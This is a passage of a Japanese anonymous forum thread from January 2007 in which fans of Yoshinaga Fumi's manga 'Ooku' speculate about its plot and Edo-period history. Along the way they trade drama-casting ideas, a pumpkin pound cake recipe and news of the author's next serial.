そういう分が凄くうまいと思う。

403 :花と名無しさん:2007/01/06(土) 17:45:51 ID:???O
実際の江戸時代でも乳はセクシャルなパーツではなく
単なる母乳製造器官と見られていたから、別に隠したりしてなかったんだよね。
女性でも人前で普通に上半身裸になってたし、浮世絵でもよく
リラックスして煙草ふかしながら乳ポロしてる女性の絵があったりするw
ハワイ等でもそうだが、乳を隠すようになったのは西洋(キリスト教)の影響だと。

404 :花と名無しさん:2007/01/06(土) 17:56:36 ID:???0
やっと読めた。
春日局がそっくりさんをあてがおうとしてるのは、単に新しい子種募集で
お万を殺して替わりに…という訳ではないのではないかと思った。
お万を説き伏せ、エッチの間だけ入れ替える、みたいな?(現実味なさげだがw)
お万の場合、一応ちゃんとした出自の人だし、むしろ種がついたら
そっくりさんの方を殺してしまおうと思ってそう。
つーか、めでたく世継ぎが生まれた暁には、
側室全員あぼんしてしまう予定にしてるんじゃないだろうか。
だから自分の身内を千恵姫とは関わらせないようにしてるんだと思った。
(肉体関係が出来たら情も湧くだろうしね)

千恵姫も…シゲみたいな性格だったらどうしようかとw
(甘いマスクとやさしい言葉に弱い、みたいな…)

405 :花と名無しさん:2007/01/06(土) 19:40:24 ID:???0
なんとなく、自分が子種がないため、いろんな男と寝なきゃいけない家光のために
自分の代わりとしてお玉を差し出すのかなあと思ってる。


406 :花と名無しさん:2007/01/06(土) 22:09:27 ID:???0
むしろ、お玉がその役を買ってでそうな
気もする。

407 :花と名無しさん:2007/01/06(土) 22:12:40 ID:???0
>404
私は男家光が春日の子じゃねーかと疑ってるw
んで今影武者やってる春日息子がホントの家光

408 :花と名無しさん:2007/01/06(土) 22:14:53 ID:???0
>>406
色々と上昇志向の強そうな捨蔵への対抗心から、お玉が子種仕込む役にって
言いそうだよね

409 :花と名無しさん:2007/01/06(土) 22:31:43 ID:???0
>>407
ちょい待ち。その解釈だと、千恵姫を拉致して大奥で跡継ぎ産めと
拘束する必要はないと思うが。

410 :花と名無しさん:2007/01/06(土) 22:32:50 ID:???0
子種を仕込んだら「御種様」に成り上がって他の側室より上に行くわけだから
捨て象がそうなるのを嫌がってお玉が立候補するんじゃないかと

411 :花と名無しさん:2007/01/06(土) 22:36:03 ID:???0
>409
だからこそ「千恵姫(自分の孫)の息子」を将軍位につけたくて子作りをせかすんでは?
春日の頭の中では女将軍はアリエナスなんだから千恵姫の「存在自体を内緒」にするには拉致しかない。

412 :花と名無しさん:2007/01/06(土) 22:54:16 ID:???0
おいおい、その説だと春日はいくつで千恵を生んでるんだよ

413 :花と名無しさん:2007/01/06(土) 23:02:06 ID:???0
実子を社会的に抹殺してでも、家光の血統にこだわり、
自らの女としての妄執を、「徳川のため」=天下太平のためと
思いこんでいるところが、春日局という女性の凄みだと思うので、
その案だったら、ちと興ざめかなー。

414 :花と名無しさん:2007/01/06(土) 23:03:24 ID:???0
>>412
春日が生んでるのは千恵の父親の方ってことだろう?
私も407の言うことはちらっと思ったことがあった。
顔が似てるって話が前出なかったっけ。

415 :407:2007/01/06(土) 23:10:55 ID:???0
書き方が悪くて誤解呼んだようでスマソ

男家光=ホントの家光=千恵姫の父親のことです。
乳児の時期に自分の子と家光をすり替えたんじゃないかと。

416 :花と名無しさん:2007/01/06(土) 23:39:14 ID:???0
>407
本当の家光は乳児の時期に事故かなんかで死んじゃってて
替え玉(春日の子かどっかから入手した乳児)とすりかえたんじゃないかとオモタ

人や時代を変えて同じようなエピが繰り返し繰り返し出てくるのがよしながさんの手法だし
千恵姫が初めて産んだ赤ん坊の夭折と重なる気がして。


417 :花と名無しさん:2007/01/06(土) 23:48:06 ID:???0
ああ、顔をみてるとそんな感じもする。>>415

お万は、春日(あるいは捨蔵)の陰謀で、決定的に
子種を立たれてしまうんじゃないかな(その方法は考えたくないがorz)
で、主と愛する男の窮地を救うという、お玉と千恵姫の利害が一致する、と。

お万とお玉って、大奥の中ではかなり信頼を得てる位置にあるよね。
来るべきクーデターの伏線のようだ

418 :花と名無しさん:2007/01/06(土) 23:56:09 ID:???0
史実の家光の方が、春日と家康の子供だっていう
陰謀論みたいなのは昔からあるよね。
みんな考えることは同じだね。
やっぱり母親は愛さないのに乳母が溺愛ってなると妙にかんじるのかな。
でも戦国時代は子を産んでも心は実家の女のままでスパイとして情報おくって
婚家を滅ぼした大名の妻とかいるから
母の愛が薄いとか子供をえこひいきとかよくあることだったんじゃないのかな?
政宗も信長も実の母に冷たくされて乳母に守られて育ったって言うし。
乳母は自分の乳あげてる子が跡取りになって出世すれば
一族郎党みな出世約束されるから溺愛するのは当然だし。

419 :花と名無しさん:2007/01/07(日) 00:08:21 ID:???0
>418
乳母という存在が政権争いの黒幕っていう説は、永井路子女史の著書に詳しく記されてるよ。
春日の局は、その「権力持った乳母」の最後の人ではなかったか。と思っている。
後の歴史の乳母は、文字通り「お乳を上げるだけ」の存在になったと。

420 :花と名無しさん:2007/01/07(日) 00:18:16 ID:???0
春日局は明智光秀の縁者だから二代将軍の御台所お江(=信長の姪)に疎まれ巻き添えで家光も嫌われた…という説もある。
戦国の世で誰が誰の敵とか言いだしたら切りがない気もするがありえなくはない。

ましてお江に嫌われた春日が自分の子と家光をすり替えたのなら
「憎い信長の血筋を将軍位に付けない」ことが目的になりうるかも


421 :花と名無しさん:2007/01/07(日) 00:24:32 ID:???0
昔の貴人の間では、自分で子を育てるという文化がなかったし、
スキンシップがなければ、愛情が湧かなくても不思議ではないような気がする。

>>419の下一行目、こないだテレビでやってたね。結構エロかったw

422 :花と名無しさん:2007/01/07(日) 00:54:47 ID:???0
>>421
特に武家社会では、長男は跡取りとして教育する為に母親から取り上げられたとかいうしね

423 :花と名無しさん:2007/01/07(日) 03:06:57 ID:???0
家光母も政宗母も長男を「家のため」で取り上げられた反動で
次男は自分の手元で(たぶん時折は乳もやって)育ててるんだよね
んで次男可愛さに暴走するのも一緒

424 :花と名無しさん:2007/01/07(日) 08:06:26 ID:???O
乳母とデキてたっぽい将軍もいたらしいね

425 :花と名無しさん:2007/01/07(日) 08:09:20 ID:???0
それはあれだ、女体の扱い方の手ほどきをするっつー名目でよくあることだ
正室が嫁いでくる前に、側室あてがったりなー

426 :花と名無しさん:2007/01/07(日) 10:28:12 ID:???0
今回、姫とお万の閨シーンで「つい京都弁が出る」って台詞あったよね。
あれが今後、捨がそっくりとして成り代わってきた時の伏線に読めてしょうがなくて。
夜だし暗いから最初は分かんなくても、言葉で分かるとか。

427 :花と名無しさん:2007/01/07(日) 11:49:41 ID:???0
室町時代だけど将軍、足利義政の最愛の側室は乳母の今参局(いままいりのつぼね)
正室の日野富子を呪ったとかで騒動になったはず

428 :花と名無しさん:2007/01/07(日) 14:57:49 ID:???0
乳母→側室コースって平安時代からよくあったよ。
何故かというと「添臥(そいぶし)」は乳母がつとめる事が多かったため。
そのままズルズルと同衾を続けて手が付いちゃう事もあったとか。

乳母といっても実際にお乳をあげるのは下女で、
母方の縁者の未婚の女性が教育係として選ばれたりした。

429 :花と名無しさん:2007/01/07(日) 15:56:33 ID:???0
>>428
へ〜未婚の女性が原則なんだ?
色々読んでると「乳母の息子で、主人とは乳兄弟」っていう人物がよく登場してくるから
子供のいる女性が対象なのかと思ってた

430 :花と名無しさん:2007/01/07(日) 16:53:56 ID:???0
>429
未婚非婚関係なく「乳母=幼児期の後見人的役割の女性」
漢字が「乳の母」だから母乳のイメージだけど乳は出なくてもOKなわけ


431 :花と名無しさん:2007/01/07(日) 17:00:54 ID:???0
>>429
どこにも「未婚の女性が原則」なんて書いてないと思いますが?
乳母=養育責任者だから未婚でも有能なら務まるってだけ
春日局のように母乳と教育の両方を勤める場合は当然既婚で子持ち

乳兄弟に関していえば未婚の乳母が結婚して子供ができても乳兄弟だよw

432 :花と名無しさん:2007/01/07(日) 19:37:44 ID:???0
大奥の女家光は、お市の方のひ孫になるんだね。
淀殿は大伯母、そんな戦国の血を彷彿とさせる
エピソード出てこないかな

この「大奥」いくらでも話が膨らみそうで、すごくたのしみ。
幕末までやってくれないかな

433 :花と名無しさん:2007/01/07(日) 22:02:17 ID:???0
女の髪型が「日本髪」へ変るのを出してくれたのがちょっと嬉しい

434 :花と名無しさん:2007/01/07(日) 22:59:21 ID:???0
>>428
マザコン願望のある男性にとってはすっごい美味しい状況だなw
実質母みたいな存在でありながら生みの母ではないからそっちの面倒まで
見てもらえて好都合

435 :花と名無しさん:2007/01/07(日) 23:31:54 ID:???0
>>432
わたなべまさこの「春日局」とか読んだらいいんじゃないかと。
ちょうどそういうエピソードが出てくるので。

436 :花と名無しさん:2007/01/07(日) 23:43:20 ID:???0
>>わたなべまさこの「春日局」

お気に入りの娘が
少年家光に舌を鋏で切り落とされちゃうのを
一瞬想像したw

437 :花と名無しさん:2007/01/07(日) 23:49:10 ID:???O
大奥立ち読みで二冊とも読んでおもしろかったけど、ぶつぶつが気持ち悪くて買えなかった。
あれが家にあるのはちょっと……。
どうせヘタレですよ。

438 :花と名無しさん:2007/01/07(日) 23:59:07 ID:???0
今時立ち読みで全部読める本屋があるのか。いいなぁ。

439 :花と名無しさん:2007/01/08(月) 00:01:14 ID:???0
ブコフで読んだのかと勝手に推測したけど>437

440 :437:2007/01/08(月) 00:18:40 ID:???O
田舎なんでね(一応県庁所在地だけど)でも県内で1、2を争う大きい本屋だよ。
しかも立ち読みしてても店員はなにも言わない。

ちなみに『西洋骨董洋菓子店』はちゃんと持ってる。
あのぶつぶつさえなければな〜。この感動を布教できないのが悲しい。

441 :花と名無しさん:2007/01/08(月) 00:36:39 ID:???0
ルイ14世は怖くて塗りつぶした私だが、
あのぶつぶつは平気だった。
実在しない病気だからかな。

442 :花と名無しさん:2007/01/08(月) 00:51:10 ID:???0
ねえさん15世!

443 :花と名無しさん:2007/01/08(月) 00:53:19 ID:???0
昔あったスイートホームという映画のゲーム@ファミコンwの
鉈男が現れた!ってのを思い出したわ>ぶつぶつ

444 :花と名無しさん:2007/01/08(月) 01:02:21 ID:???0
まぁそういう生理的嫌悪感みたいなものって人によって違うからねぇ…。
今のところ大奥は何度も読み返して今後の展開を色々推測するのが
面白いので、読めない人は気の毒と思ってしまうが…。
映画(実写)でのグロは受け付けないだけど、柴田昌弘と和田慎二に
慣らされた私は漫画のグロは全然おkになってしまったw

445 :花と名無しさん:2007/01/08(月) 01:04:48 ID:???0
私はあーみんで免疫を得たwまあちょっとグロとは違うが。

446 :花と名無しさん:2007/01/08(月) 01:19:34 ID:???0
日野日出志読んでショックで熱出して以来大概の絵は大丈夫になってしまったw

447 :花と名無しさん:2007/01/08(月) 01:59:14 ID:???O
史実ではお万は大奥をいずれまとめあげる人になるんだよね
でもお万好みが生まれた話を考えると余り長生きは出来なかったような気がする…
史実のように出世するなら「あの側室で取り締まりの」って説明があっても良いと思うんだよなぁ

448 :花と名無しさん:2007/01/08(月) 02:19:49 ID:???O
今のお万の話もすんごくおもしろいが、早く吉宗様の時代の続きが読みたい

杉下に萌えすぎてたまらん

449 :花と名無しさん:2007/01/08(月) 03:13:01 ID:???0
杉下は一生あの役どころで終わるのかな。
吉宗が「大奥でのおみつ」として信頼して転じて情をかけるとかないかな。
吉宗公は御台様を迎えるまでは大奥=世継ぎ仕込み、と割り切るかね。
史実詳しくないんだけどお褥すべり=もうお閨にあがること厳禁なのか。
本来30代前半ならまだ全然大丈夫だと思うんだけど。

450 :花と名無しさん:2007/01/08(月) 08:02:44 ID:???0
>>447
そこらへんはさすがに史実通り長生きさせるような気がする。


451 :花と名無しさん:2007/01/08(月) 09:21:28 ID:???O
>>449
でも若いころ種を搾りとられたみたいだし…どうなんだろ?

452 :花と名無しさん:2007/01/08(月) 12:29:28 ID:???O
>>449
杉下の女性に対するトラウマを吉宗公が徐々に癒してくれないかなあ。
卯吉みたくいきなりいただかれるんじゃなくて
精神的に惚れてからくっつくといい。
千恵とお万の逆パターンみたく。

453 :花と名無しさん:2007/01/08(月) 12:41:56 ID:???0
うーん、でも杉下には吉宗とストイックな関係で
吉宗の片腕になって欲しいな

メロ最新号立ち読みしたけど(スミマセン)、家光姫が恋する乙女で
かわいかった
有功様が京ことばになるということは、自分も飾らずに本音が
出てしまう、てことだろうなぁ

454 :花と名無しさん:2007/01/08(月) 12:56:57 ID:???0
>449
お褥すべりは実際の大奥にもあったものだからなあ。
女性は30くらいで閨に侍ることはなくなるという。
で、他の側室に対抗するために代わりに自分のおつきとかを差し出すこともあったという・・・

455 :花と名無しさん:2007/01/08(月) 12:59:27 ID:???O
杉下には心身共に癒される女性に巡り会って欲しいと思うが
子供うんぬん関係ない、本当の年寄りになってからでもそれはいい気もする。
今は男女関係なく、必要とされたい相手に必要とされる立場がいいんだろうな
水野や吉宗公に仕えるように。

456 :花と名無しさん:2007/01/08(月) 13:03:16 ID:???0
>>449
変な政治的野心とか、長きにわたる寵愛→権力集中を防ぐためと考えて
おけばいいんではないかと。

457 :花と名無しさん:2007/01/08(月) 15:28:40 ID:???0
母親は子供の政治的な後ろ盾みたいなところがあるから、
ある程度年いってから産んでも、子供が成人するまで
守ってやれないってのもあるんじゃないか?
人生50年な上に、毒を盛るだの暗殺だのが日常な世界なわけだし

458 :花と名無しさん:2007/01/08(月) 16:12:27 ID:???0
吉宗って一応、江戸城に入った時は長男(次の将軍)がいるよ。
だから子づくりにそんなにあせる必要はない。
(このあと子供もできるけど)

459 :花と名無しさん:2007/01/08(月) 17:27:39 ID:???0
ここ読んでから改めて2巻を読み直したら
確かに春日と男の家光(ブツブツで死んだ方)って顔立ちが似ている
特にへの字眉と笑った時に口の端がむにっと歪に上がるとこが似てるよ…

460 :花と名無しさん:2007/01/08(月) 18:37:46 ID:???0
>459
ペットも飼い主に似てくるというから、あれだけべったべたの関係でしかもベクトルが
限りなくズレまくった養育されたら、嫌なところ限定で似てきても不思議ではない気もする。
>春日&男家光

461 :花と名無しさん:2007/01/08(月) 22:44:20 ID:???0
夫婦も似てくるしね
実際どうなのかな

462 :花と名無しさん:2007/01/08(月) 22:46:52 ID:???0
昔の医術では妊娠出産って結構危険視されてたからある程度で年齢切ったのかと思ってた。>お褥すべり
今でも高齢出産だと母子共に気ぃつけないと色々弊害出るっていうし。

でもこの大奥だとそのセンはほぼ消えるから(種の鮮度は卵ほどには重要ではない)
うーん、どうなるんだろう杉下。幸せになっていただきたいもんだけど。

463 :花と名無しさん:2007/01/08(月) 23:10:44 ID:???0
この大奥では種の鮮度が重要と考えられてるのかも
あるいは年取っちゃうと閨に呼ばれても役立たずになってしまう場合があるので
お褥すべりの年齢が決められたとか

464 :花と名無しさん:2007/01/08(月) 23:37:06 ID:???0
>閨に呼ばれても役立たずになってしまう場合があるので

ばかもんそりゃその場で打ち首っすね。

465 :花と名無しさん:2007/01/08(月) 23:49:18 ID:???0
そうやって打ち首にされる男の数を減らそうという
大奥なりの配慮だったりなー。

勃たない挙げ句にその場で打ち首なんて、嫌すぎる……

466 :花と名無しさん:2007/01/09(火) 00:36:08 ID:???0
ところでこの話題って既出ですか?
没日録の書き手の、あのじいさんって誰なんだろう?
今のところ一番若い玉栄で決まりかな?

467 :花と名無しさん:2007/01/09(火) 00:43:15 ID:???0
>466
村瀬のじいさんでしょ 1巻で名前が出てるし
2巻で若き日の村瀬さんでてるじゃないの

468 :花と名無しさん:2007/01/09(火) 02:32:02 ID:???0
>>466
志村せめて名前くらいは確認しれ

469 :花と名無しさん:2007/01/09(火) 04:38:20 ID:???0
>>466
志村せめてこのスレくらいは嫁

470 :花と名無しさん:2007/01/09(火) 06:41:08 ID:???O
>>466
志村アンパン買ってこいよ

471 :花と名無しさん:2007/01/09(火) 07:20:28 ID:???0
>>466
志村ーうしろー

472 :花と名無しさん:2007/01/09(火) 11:31:13 ID:???0
>>466
志村の人気に嫉妬

473 :花と名無しさん:2007/01/09(火) 16:26:10 ID:???0
>>466
志村に暇を取らす!下がりゃ!

474 :花と名無しさん:2007/01/09(火) 17:05:40 ID:???0
>474
志村、わかっておろうな。

475 :花と名無しさん:2007/01/09(火) 17:32:49 ID:???O
>>474
おまえさん……


てか村瀬って誰だっけ

476 :花と名無しさん:2007/01/09(火) 17:40:23 ID:???0
>>475
2巻で登場の村瀬氏は「その薄気味悪い京言葉はやめてください」
とかなんとか言った一応お万の世話役の人。

477 :花と名無しさん:2007/01/09(火) 17:57:05 ID:???O
あー!あの
ありがとんノシ

478 :466:2007/01/09(火) 21:07:10 ID:???0
皆突っ込みありがd ってええぇー…漏れ詰め腹切らされんのー…
腹切る代わりに歴史ググってきてお玉の方の運命に吹いた。
どうしよう、子猫への罪悪感におびえるお玉の
娘が猫公方とかになったら。

479 :花と名無しさん:2007/01/10(水) 01:04:22 ID:???0
>>478
大丈夫大丈夫。
とりあえずお前さんは
名前確認してからスレ読んでアンパン買ってくる時に
後ろに気をつけて嫉妬されないように自重しつつ
暇を貰って含みを持たせるような相槌うなずきをすりゃいい。

480 :花と名無しさん:2007/01/10(水) 04:52:11 ID:???0
文藝の対談読んだー。なかなか面白かった。
新連載決まってるのはガイシュツ?一応下げとく。





40代ゲイ夫婦のヒューマンコメディとのこと。
弁護士と美容師で、片方はカミングアウト済みらしい。
毎回ご飯が出てきて性描写はあまり(殆ど?)無いって。

481 :花と名無しさん:2007/01/10(水) 05:04:32 ID:???0
>>480
情報ありがとうございます。
新連載の掲載誌わかりますか?まさかウイングス?

482 :480:2007/01/10(水) 06:13:22 ID:???0
>>481
うーんハッキリ明記してなかった気が。
対談の中でちょっと話に出した感じでした。

483 :花と名無しさん:2007/01/10(水) 11:42:38 ID:???0
それだけ聞いた限りだと、愛が無くても〜ぽくなりそう。

484 :花と名無しさん:2007/01/10(水) 18:05:13 ID:???0
やだーおむぎとペー子みたーい!
ってあの2人は夫婦じゃなくて兄弟だが。

485 :花と名無しさん:2007/01/11(木) 00:39:53 ID:???0
とても面白そうだけど友達に貸しにくい内容だなあ。
もっと布教したいのに。

486 :花と名無しさん:2007/01/11(木) 01:07:09 ID:???0
>>481
音羽の青年誌

487 :花と名無しさん:2007/01/11(木) 02:46:11 ID:???O
こないだ漫喫で2巻読んだのでウロ覚えなのだが、
最後の方で「わたしだけの上様」って描写ありませんでした?
(違ってたらすみません)
ある意味「わたしだけの」じゃなくなるんだよね…


488 :花と名無しさん:2007/01/11(木) 05:52:15 ID:???0
>>486
まさかモーニングとか?
それとも増刊のモーニング2の方かな。

489 :花と名無しさん:2007/01/11(木) 07:53:15 ID:???0
朝か午後がいいなあ…


490 :花と名無しさん:2007/01/11(木) 10:27:52 ID:???O
>>487
あったよ。あの二人には幸せになってほしいんだけど…無理かな(・ω・)

491 :花と名無しさん:2007/01/11(木) 16:32:07 ID:???0
・緊急重版情報のコーナーより ttp://www.hakusensha.co.jp/book-store/
重版出来日 作品タイトル 巻数 作者名
2007年1月15日 大奥 2巻 よしながふみ

売れてるらしい。フラワーもけっこう書店に並んでいる数が以前より
増えてるので、好調だね>よしながさん




492 :花と名無しさん:2007/01/12(金) 07:27:00 ID:???0
最寄り駅の中にある書店に、
よしながさんの「大奥」のためのコーナーができてた。
本当に片隅なんだけど、まだ2巻しか出てない本に、
わざわざコーナーを作るってのもすごいと思った。

493 :花と名無しさん:2007/01/12(金) 11:28:54 ID:???O
フジTVのドラマの影響もありそうだけどね>大奥の人気
店頭にて、ドラマのコミクス化かな?→買う→違かったけど面白かった(゚∀゚)

494 :花と名無しさん:2007/01/12(金) 20:40:18 ID:???0
>>493
昨年末に郵便局へ行ったら映画『大奥』(仲間由紀江のやつ)のポスターが貼ってあり、
数瞬「(よしなが大奥も)とうとう映画化されたのかー」などと感慨に耽ってしまいました。

495 :花と名無しさん:2007/01/12(金) 23:09:18 ID:???0
>494
吉宗・水野編だけでもドラマ化してくれないかなぁ。(姫家光・お万編はいろんな意味で映像化は無理と見た)
吉宗は、ほとんどすっぴんのあまみゆうきとか。「下がりゃ!」とかど迫力だよきっと。
あ、あと六代将軍徳川家宣は例の「占いおばさん」で。(そっくりだ!と思った・・)
台詞は偉そうに一言「うむ」だけでいいし、綺麗な打掛着てかんざしいっぱいつけて、
ジャニーズ系のイケメン両脇にひれ伏させて、ふんぞり返って歩くだけなんだから、
大喜びで出演しそう。

496 :花と名無しさん:2007/01/12(金) 23:16:01 ID:???0
>>495
「占いオバハン」なんか出したら、番宣でバラエティ出まくって
「大奥特集」とか組まされた中で、不愉快発言てんこ盛りでしそうだ…

497 :花と名無しさん:2007/01/13(土) 00:49:13 ID:???0
ミッチーでいいじゃん

498 :花と名無しさん:2007/01/13(土) 00:50:32 ID:???0
うん、吉宗・水野編の2時間ドラマ見たいなあ
藤波と久通のやりとりなんか思いっきり見たい

499 :花と名無しさん:2007/01/13(土) 00:57:30 ID:???0
水野編はサクセスストーリー+時代劇的なスカッとする終わり方で
すごくTV向きな気がする。ぜひともやってほしい。

500 :花と名無しさん:2007/01/13(土) 02:33:18 ID:???0
千恵姫の産んだ子供、「女児なんてイラネ」って春日婆がくびり殺したんじゃないよね?
考えすぎか。

501 :花と名無しさん:2007/01/13(土) 02:55:43 ID:???O
>>499
話の長さも2時間くらいでちょうど収まりそうだしね
長過ぎず短過ぎず

502 :花と名無しさん:2007/01/13(土) 10:51:34 ID:???0
>498
是非ジャニか宝塚で(美形男衆が多いという理由で)

503 :花と名無しさん:2007/01/13(土) 11:35:40 ID:???0
>>500
さすがにそれはない・・・と思う。
意気消沈して子づくりどころじゃない、という状態になりそうだし、産まれてくる
男児のための子育てシミュレーションにするかと思う。
殺すほどの意味はないし、産まれた直後だからね。変なことしたらわかるよ。
乳を吸わない→何時間も抱きかかえている→冷たくなっても信じられなくてそのまま
離さない、とかだったらさらに泣けてくる。

504 :花と名無しさん:2007/01/13(土) 13:27:02 ID:???0
吉宗は天海さんがいいなと思ったりはする。

505 :花と名無しさん:2007/01/13(土) 13:29:50 ID:???0
流れをぶった切ってすまん

フラワー2巻に出てた、ねーちゃんレシピのかぼちゃパウンドケーキを作った。
バター100g→ ケーキ用無塩マーガリン100g+塩少々
砂糖100g→ 90g
にして、パウンド型がなかったから牛乳パックにクッキングペーパーを敷いた物を使用。
(牛乳パックは2枚重ねにして、ホッチキスで留めるといい)
かぼちゃペーストが混ぜる時に少し固くなっちゃっててうまくマーブル状にならんかったが、
超ウマー(*゚∀゚)=3
簡単だったし、友達にも大好評だったよ。

506 :花と名無しさん:2007/01/13(土) 14:38:32 ID:???0
ここでトランス脂肪酸解説投下


507 :花と名無しさん:2007/01/13(土) 14:55:49 ID:???0
>505
バターをマヨネーズみたいな柔らかさに練るのがポイントだよね
電動ミキサー持ってる人は、ベーキングパウダー使わずに、卵白をぶわーっと泡立てまくってから混ぜてもう・ま・い・よ
バター+砂糖ねりねり +卵黄まぜまぜ +卵白ブワー +粉切るように混ぜ

508 :花と名無しさん:2007/01/13(土) 15:09:54 ID:???0
>>505
ゼータクする余裕があるときは、醗酵バターで作っても美味しいよ
業務用のだと比較的お手ごろ価格

509 :花と名無しさん:2007/01/13(土) 15:42:20 ID:???0
>>500
あの女児は、尾張家御簾中千代姫になるんじゃないの?

尾張に嫁いだ千代姫と紀州家に嫁いだ鶴姫(綱吉の娘だっけ?)が出てこないと
吉宗将軍就任時の尾張VS紀州の跡目争いがなくなってしまうし。
と言うよりも、千代姫がないと吉宗が将軍になる資格が消えてしまうから。


510 :花と名無しさん:2007/01/13(土) 16:33:59 ID:???0
>>508
「骨董」の中に出てきた、エシレ産の発酵バターをデパ地下で見かけた。
100g(だったかな?)900円ほどしてたが、これでケーキを焼くとどうなるのか
口の中に妄想が広がった



511 :花と名無しさん:2007/01/13(土) 22:28:16 ID:???0
>>500
女が邪魔な状態ならともかく、女児がいたって支障はなにもない(むしろ政略結婚の道具として利用可能)
し、殺す理由がないと思う。
結果的にやまほど生んだ子供の中に男が数人、できればできのいいのが混ざってればそれでokだし。

512 :花と名無しさん:2007/01/13(土) 22:50:09 ID:???0
てか、春日局は政治的には敏腕で冷徹でも、
根っこは徳川幕府<家光って人なんだから、
家光の孫を殺しゃしないだろ。

千恵が強姦された時も、人並に悲しんでたみたいだし。

513 :花と名無しさん:2007/01/13(土) 22:54:09 ID:???0
千恵自身(と母親)だって日陰の身ながら家光が死ぬまでは何不自由ない暮らしを
与えられてたしね。

514 :花と名無しさん:2007/01/13(土) 23:08:31 ID:???0
今日再放送してたフジドラマの大奥第一章、家光時代だから見てみたんだけど
大奥の女性たちみんな髪結ってた。この頃ってまだ垂れ髪じゃなかったっけ?
あと、よしなが大奥の吉宗公の髪型がとても好きなんだけど、あの髪型って時代劇とか
見る限り正室限定のものなのかな?詳しい方ご教授お願いします。


515 :花と名無しさん:2007/01/13(土) 23:09:20 ID:???0
それにしても、作品内の家光は本当に稲葉正勝の言うとおり「将軍としては有能」
だったんだろうか。

まともな神経持ってるように見える正勝、胃を痛めなかったのが不思議。

516 :花と名無しさん:2007/01/13(土) 23:16:28 ID:???0
>>515
> まともな神経持ってるように見える正勝、胃を痛めなかったのが不思議。

ホントにね。
春日局の隠れた功績は、あの家光のために子供としてえらい雑な扱いを受け、
臣下としてもさんざん苦労をさせられ、挙げ句に、一生表に出られぬ身になっても
徳川家に刃向かわずに頑張り続ける忠義の男・正勝を産んだことかもしれん。

517 :花と名無しさん:2007/01/13(土) 23:24:55 ID:???0
>>516
他の幕臣を見ると、春日局には自分の下にある人間を
誠実で有能な人物に育てる力は備わってるみたいだよね
そこに溺愛が入ると千恵曰く「ただの親馬鹿」になってしまうわけだが

518 :花と名無しさん :2007/01/13(土) 23:38:22 ID:???0
ここの大奥って将軍の子供はどこで誰が育ててるんだろ?
お種様たちがそれぞれ乳母を雇って育てるのかな。

519 :花と名無しさん:2007/01/14(日) 00:01:56 ID:???0
吉宗公の時代になると閨の簾のむこうにお添い寝が複数いたり続き部屋にも控えの者がいるけど
女家光と有功の時代はどうなんだろう。描かれてないだけで法度として確立してるのかな。
まだ二人のみの同衾だとすると今後そっくりさんの入れ替わりと絡んできそうな気が。

520 :花と名無しさん:2007/01/14(日) 06:47:18 ID:???0
>514
ドラマ、特にTV時代劇って風俗的な時代考証ははっきり言ってめちゃくちゃ。
よしなが大奥、今回、女性の髪形が垂髪から島田(当時の遊女の結い髪が発祥源)に移る
過渡期を描いてるね。
姫家光が正式に表の存在になる時は、そういう髪型してるんだろうか?

ところで1巻で出てきた「お万ごのみ」の意匠。
最初は有功のものだと思い込んでたんだけど、今回の話の流れからすると、「お万」ってもしかしたら
捨蔵のことかもしれない・・・ってちょっと考えるようになった。
(お栄の”最新流行のヘアスタイル”を褒めるあたり、センスは悪くないと感じる)
もう姫家光は「有功」って呼んでるし。・・・どうなるんだろ?

521 :花と名無しさん:2007/01/14(日) 07:00:11 ID:???0
お万好みのお万がどちらかはわからないけど、有功のことだったとしてもお万として伝えられると思う
伝える場合は男名ではしないだろうから

522 :花と名無しさん:2007/01/14(日) 08:36:38 ID:???0
>>519
お添い寝の制度ができたのは、史実では五代将軍以降。
だからまだ三代の時はいないんじゃ。

523 :花と名無しさん:2007/01/14(日) 12:37:58 ID:???0
非公式に春日の命令で天井裏からお庭番とかがのぞいてそうだなー

524 :花と名無しさん:2007/01/14(日) 12:57:29 ID:???0
そろそろ歴史オタがうざくなってきた…
時代考証とか細かいことは日本史板にでも別スレ立ててやっとくれ。
その方がもっと本格的な人の意見ももらえるだろうし。
http://academy5.2ch.net/history/

525 :花と名無しさん:2007/01/14(日) 13:43:39 ID:???0
別スレなんかわざわざ立てる必要なし
私は面白く読ませてもらってます、うざくない

526 :花と名無しさん:2007/01/14(日) 14:08:06 ID:???0
>>525
同意する。
今後の展開の予想の一つにもなるし
知らないより知ってたほうが楽しめると私は思うので。
そればっかりになったら困るけど、そんなこともないしね。

527 :花と名無しさん:2007/01/14(日) 14:21:26 ID:???0
歴史うんちくが読みたくない人は、「史実」をNGワードにすればいいんじゃね?

528 :花と名無しさん:2007/01/14(日) 14:56:46 ID:???0
史実とはここが違います!とか言い出したら、
「これはSFなんだよ、ウザー」とか思うけれども
「史実はこうだから、もしかしたら、こうなるんじゃ?」
ていうのだったら、別に気にならんが

529 :花と名無しさん:2007/01/14(日) 15:10:01 ID:???0
空気読めてないのは524ってことで。

530 :花と名無しさん:2007/01/14(日) 15:17:47 ID:???0
その昔『おらが丸』という漫画のせいで家光は美形という刷り込みがあった
よしなが版家光見てのけぞったw
しかしへたに美形に描かれてなくてこれはこれで人間味があって(・∀・)イイ!!
でもこれで女装してるところなんか想像したらちょっと嫌だけどw

531 :花と名無しさん:2007/01/14(日) 15:25:58 ID:???0
>530
2.5代将軍徳川家家

532 :花と名無しさん:2007/01/14(日) 15:50:31 ID:???0
家光って、女が嫌いなのに、どうして女装したり化粧したりは好きだったんだろう

533 :花と名無しさん:2007/01/14(日) 15:59:06 ID:???0
女性蔑視って言うより男好きのケが強かったんでしょう

昨日私もテレビの大奥見た
お万はやっぱり子供はできないのね・・・

534 :花と名無しさん:2007/01/14(日) 16:02:02 ID:???0
しかし今回六人衆の一人の松平信綱自身、嫡子が実際にはおらず、女子を身代わりに立てている
というのは、今後女子相続が幕閣で議題に上ったときにスムーズに事が運ぶ複線でしょうね。


535 :花と名無しさん:2007/01/14(日) 16:07:27 ID:???0
いや、私も正直ウザいと思ってはいるが、
今はそれぐらいしか語ることがないんだから仕方ないと思う…。

>>514
吉宗の髪型って下げ髪のことかな〜?
(ごめんマンガ今ないんで、文章からの推測)
あの尻尾をくるっと輪にしたのを櫛で横差しにすると
「片はずし」という、殿中の高級女中や武家女房の結う特有の髪型になる。(島田ではない)

殿中の女性が髪を結うようになったのは、四代将軍以降で
明暦の火事で髪に火が燃え移ったのが危ないかったからってので
全面廃止になったそうだ。あとやっぱり仕事の邪魔だしね。



536 :花と名無しさん:2007/01/14(日) 16:17:34 ID:???0
>>532
つ「ドラッグクイーン」

